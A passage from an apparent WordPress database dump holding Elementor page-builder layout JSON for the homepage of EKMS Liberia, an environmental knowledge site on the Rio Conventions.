center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\"},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Click me\",\"title_color\":\"#2df700\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(5866,525,'_elementor_version','2.7.5'),(5867,525,'_elementor_template_type','wp-page'),(5869,526,'_wp_page_template','default'),(5870,526,'_elementor_edit_mode','builder'),(5871,526,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_forest_biodiversity.jpg\",\"id\":396},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"400\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"All Categories\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center 